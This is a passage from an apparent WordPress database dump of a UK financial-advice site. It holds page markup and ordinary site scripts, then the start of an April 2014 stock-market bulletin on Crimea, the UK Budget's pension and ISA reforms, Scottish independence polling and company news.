class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nReddit\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"tumblr\"><a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fapril-2014-stock-market-bulletin%2F&amp;name=April+2014+Stock+Market+Bulletin&amp;description=We+started+last+month%E2%80%99s+bulletin+in+the+Crimea%2C+with+Russian+troops+in+de+facto+control+of+the+peninsula.+Well%2C+the+Crimea+is+now+part+of+Russia+again+and+the+collected+denunciations+and+threatened+sanctions+....\" target=\"_blank\" rel=\"nofollow\">\r\nTumblr\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nTumblr\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"google\"><a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/april-2014-stock-market-bulletin/\" target=\"_blank\" rel=\"nofollow\">\r\nGoogle +1\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nGoogle +1\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"tf-pinterest\"><a href=\"#\">\r\nPinterest\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nPinterest\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"email\"><a href=\"mailto:?subject=April 2014 Stock Market Bulletin&amp;body=http://www.equalitywalk.org.uk/april-2014-stock-market-bulletin/\">\r\nEmail\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nEmail\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class=\"about-author\">\r\n\r\n&nbsp;\r\n<div class=\"title\">\r\n<h2>About the Author:</h2>\r\n<div class=\"title-sep-container\"></div>\r\n</div>\r\n&nbsp;\r\n<div class=\"about-author-container\"></div>\r\n&nbsp;\r\n\r\n</div>\r\n<!-- You can start editing here. -->\r\n\r\n<!-- If comments are open, but there are no comments. -->\r\n<div id=\"respond\" class=\"comment-respond\">\r\n\r\n&nbsp;\r\n<div class=\"title\"></div>\r\n<small><a id=\"cancel-comment-reply-link\" style=\"display: none;\" href=\"../april-2014-stock-market-bulletin/\" rel=\"nofollow\">Cancel reply</a></small>\r\n\r\n<form id=\"commentform\" class=\"comment-form\" action=\"/\" method=\"post\">&nbsp;\r\n<div id=\"comment-input\"><input id=\"author\" class=\"input-name\" tabindex=\"1\" name=\"author\" size=\"22\" type=\"text\" value=\"\" placeholder=\"Name (required)\" /><input id=\"email\" class=\"input-email\" tabindex=\"2\" name=\"email\" size=\"22\" type=\"text\" value=\"\" placeholder=\"Email (required)\" /></div>\r\n&nbsp;\r\n<div id=\"comment-textarea\"></div>\r\n<p class=\"form-submit\"><input id=\"comment-submit\" name=\"submit\" type=\"submit\" value=\"Post Comment\" /><input id=\"comment_post_ID\" name=\"comment_post_ID\" type=\"hidden\" value=\"8121\" /></p>\r\n&nbsp;\r\n<p style=\"display: none;\"><input id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" type=\"hidden\" value=\"ed534b789c\" /></p>\r\n&nbsp;\r\n<p style=\"display: none;\"><input id=\"ak_js\" name=\"ak_js\" type=\"hidden\" value=\"25\" /></p>\r\n&nbsp;\r\n\r\n</form></div>\r\n<!-- #respond -->\r\n<script type=\"text/javascript\"><![CDATA[ jQuery(document).ready(function () { jQuery(\'#commentform\').submit(function () { _gaq.push( [\'_setAccount\', \'UA-10958181-3\'], [\'_trackEvent\', \'comment\', \'submit\'] ); }); }); ]]></script>\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div id=\"sidebar\" style=\"display: none;\">\r\n\r\n&nbsp;\r\n<div id=\"text-24\" class=\"widget widget_text\">\r\n<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big></center>people who get our best financial wisdom on a weekly basis.\r\n<a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" target=\"_blank\"><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<div id=\"recent_works-widget-2\" class=\"widget recent_works\"><p>\r\n</p>\r\n<div class=\"heading\"><p>\r\n</p>\r\n<p>New Guides</p>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<div class=\"recent-works-items clearfix\">&#13;\r\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\r\n					</a>&#13;\r\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\r\n					</a>&#13;\r\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\r\n					</a>&#13;\r\n				</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\"><p>\r\n</p>\r\n<div class=\"tab-holder\">\r\n<p>&#13;\r\n			</p>\r\n<p>\r\n</p>\r\n<div class=\"tab-hold tabs-wrapper\">\r\n<p>&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<ul id=\"tabs\" class=\"tabset tabs\">\r\n</p>\r\n<li><a href=\"#tab-popular\">Popular</a></li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n															</p>\r\n<p>\r\n</p>\r\n<li><a href=\"#tab-recent\">Recent</a></li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</ul>\r\n<p>\r\n</p>\r\n<div class=\"tab-box tabs-container\">\r\n<p>&#13;\r\n										</p>\r\n<p>\r\n</p>\r\n<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">\r\n<p>&#13;\r\n												</p>\r\n<p>\r\n</p>\r\n<ul class=\"news-list\">\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										October 12th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../best-annuity-rates/\">&#13;\r\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										March 21st, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										September 10th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\r\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										September 18th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										September 5th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n													</ul>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n															</p>\r\n<p>\r\n</p>\r\n<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">\r\n<p>&#13;\r\n												</p>\r\n<p>\r\n</p>\r\n<ul class=\"news-list\">\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										June 10th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../5-facts-know-annuities/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										June 9th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										June 6th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										June 6th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<div class=\"post-holder\">\r\n<p>&#13;\r\n									<a href=\"../staging-date-social-advisors/\">When is your Staging Date Social Advisors</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										June 6th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n													</ul>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n			</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<div id=\"categories-3\" class=\"widget widget_categories\"><p>\r\n</p>\r\n<div class=\"heading\"><p>\r\n</p>\r\n<p>Post Categories</p>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (2)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (5)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (9)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (17)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var dropdown = document.getElementById(\"cat\"); function onCatChange() { if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></a>\r\n\r\n</div>\r\n<div id=\"social_links-widget-2\" class=\"widget social_links\">\r\n<div class=\"heading\">\r\n\r\nGet Social\r\n\r\n</div>\r\n<ul class=\"social-networks clearfix\">\r\n<ul class=\"social-networks clearfix\">\r\n 	<li class=\"rss\"><a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\" rel=\"nofollow\">RSS</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nRSS\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks clearfix\">\r\n<ul class=\"social-networks clearfix\">\r\n 	<li class=\"twitter\"><a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\" rel=\"nofollow\">Twitter</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nTwitter\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n<div id=\"text-23\" class=\"widget widget_text\">\r\n<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\" /></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n	</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<footer class=\"footer-area\">\r\n</p>\r\n<div class=\"avada-row\">\r\n<p>&#13;\r\n			</p>\r\n<p>\r\n</p>\r\n<section class=\"columns columns-3\">\r\n</p>\r\n<article class=\"col\">\r\n</p>\r\n<div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\"><p>\r\n</p>\r\n<p>Our Latest Posts</p>\r\n<p>\r\n</p>\r\n<ul>\r\n</p>\r\n<li>&#13;\r\n				<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\r\n						</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n					</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n				<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\r\n						</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n					</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n				<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\r\n						</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n					</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n				<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\r\n						</li>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n				</ul>\r\n<p>\r\n</p>\r\n<div style=\"clear:both;\"/></div>\r\n<p>\r\n</article>\r\n<p>\r\n</p>\r\n<article class=\"col\">\r\n</p>\r\n<div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>\r\n</p>\r\n<p>Contact Info</p>\r\n<p>\r\n</p>\r\n<div class=\"contact-info-container\">\r\n<p>&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<p class=\"address\">Manchester &amp; London</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<p class=\"phone\">Phone: </p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		&#13;\r\n		&#13;\r\n		&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		&#13;\r\n				&#13;\r\n				</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</p>\r\n<p>\r\n</p>\r\n<div style=\"clear:both;\"/></div>\r\n<p>\r\n</article>\r\n<p>\r\n</p>\r\n<article class=\"col\">\r\n</p>\r\n<div style=\"clear:both;\"/></article>\r\n<p>\r\n</section>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>				&#13;\r\n&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<article class=\"col last\"/></footer>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n	&#13;\r\n			</p>\r\n<p>\r\n</p>\r\n<footer id=\"footer\">\r\n</p>\r\n<div class=\"avada-row\"/>&#13;\r\n	</footer>\r\n<p>\r\n</p>\r\n<p><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[ jQuery(window).load(function() { jQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\" , animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true}); }); ]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"}; /* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"}; /* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script src=\"../wp-content/themes/Avada/js/main.js\" type=\"text/javascript\">// <![CDATA[\r\n<script type=\"text/javascript\" src=\"../wp-content/plugins/js_composer/assets/js/js_composer_front.js\"/></body></p>\r\n<p>\r\n// ]]></script></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','April 2018 Stock Market Bulletin','Read about','inherit','closed','closed','','47-revision-v1','','','2017-09-21 17:33:35','2017-09-21 17:33:35','',47,'http://www.equalitywalk.org.uk/47-revision-v1',0,'revision','',0),(324,1,'2017-09-21 17:34:37','2017-09-21 17:34:37','We started last month’s bulletin in the Crimea, with Russian troops in de facto control of the peninsula.\r\n<div class=\"wpb_text_column wpb_content_element \">\r\n<div class=\"wpb_wrapper\">\r\n\r\n&nbsp;\r\n\r\nWell, the Crimea is now part of Russia again and the collected denunciations and threatened sanctions of William Hague, John Kerry and the European foreign ministers will do nothing to change that.\r\n\r\n&nbsp;\r\n\r\nThe question now is what happens in the Eastern Ukraine? The area has a clear majority of Russian speakers and supporters and is no doubt on Mr Putin’s shopping list. Cue more denunciations and threats of sanctions…\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nThe question now is what happens in the Eastern Ukraine? The area has a clear majority of Russian speakers and supporters and is no doubt on Mr Putin’s shopping list. Cue more denunciations and threats of sanctions…\r\n\r\n&nbsp;\r\n\r\nNot that the rest of the world was peaceful in March. North and South Korea once again exchanged fire, this time over a disputed sea boundary. The North has warned that it may carry out a ‘new kind’ of nuclear test and seems to be becoming increasingly unpredictable as Kim Jong-un tightens his grip on power.\r\n\r\n&nbsp;\r\n\r\nIn the UK the big event was George Osborne’s Budget speech on Wednesday March 19<sup>th</sup>.\r\n\r\n&nbsp;\r\n\r\nThe Chancellor confounded those who had been expecting a ‘steady as you go Budget’ with a series of far reaching reforms to pensions and savings. It was easy to see the Chancellor setting out not only the battle lines for next year’s General Election, but also his own leadership manifesto in the event of a defeat for David Cameron.\r\n\r\n&nbsp;\r\n\r\nWorld stock markets generally had a disappointing month in March, with none of the major markets showing significant gains. Among the emerging markets India and Brazil both made good progress, gaining 6% and 7% respectively.\r\n\r\n\r\n\r\nAs noted above, the most important event in March was the Budget. The Chancellor declared that it would be a Budget for “makers, do-ers and savers” and proposed significant changes to the rules governing defined contribution pension schemes, allowing people much greater control over their own pensions and much more flexibility.\r\n\r\n&nbsp;\r\n\r\nThe Chancellor was, he said, “Prepared to trust the British people.”\r\n\r\n&nbsp;\r\n\r\n&\r\n&nbsp;\r\n\r\nThere were also major changes to the Individual Savings Account regime, with the annual limit raised to £15,000 and the limit on what can go into a cash ISA removed. They’ll now be called New ISAs, or NISAs. Cue several limp headlines in the papers…\r\n\r\n&nbsp;\r\n\r\nThis monthly bulletin isn’t really the place to go into all the implications of the Budget, but it <i>will</i> impact significantly on the financial planning of many of our clients. If you have any questions at all on what the Budget might mean for you, please don’t hesitate to contact us.\r\n\r\n&nbsp;\r\n\r\nMeanwhile, the debate on Scottish devolution rumbled on. The opinion polls currently have the ‘No’ vote on 52% compared to ‘Yes’ at 37%. For those who prefer a more reliable guide the bookmakers are convinced that independence won’t happen, and are betting accordingly.\r\n\r\n&nbsp;\r\n\r\nBad news for the ‘yes’ campaign came when 1 in 3 firms polled confirmed that they would consider re-locating head offices in the event of independence, and the Westminster government continues to rule out any prospect of a currency union with an independent Scotland. The poll is still 5½ months away, on September 18<sup>th</sup>\r\n\r\n&nbsp;\r\n\r\nTwo pieces of contrasting news in March illustrated the way the UK economy may be moving, both short and long-term. Supermarket group Morrison’s issued its second profits warning as it struggled to maintain market share, squeezed by Aldi and Lidl on one side and Tesco and Sainsbury’s on the other.\r\n\r\n&nbsp;\r\n\r\nMeanwhile King Digital (a company that very few readers of this bulletin will have heard of) became Britain’s most valuable publicly listed internet company when it floated on the New York stock exchange with a valuation of $7.6bn.\r\n\r\n&nbsp;\r\n\r\nWhat does King Digital do? It makes <i>Candy Crush</i> a game which 144m people play on their mobiles every day. That’s right, a hundred and forty-four 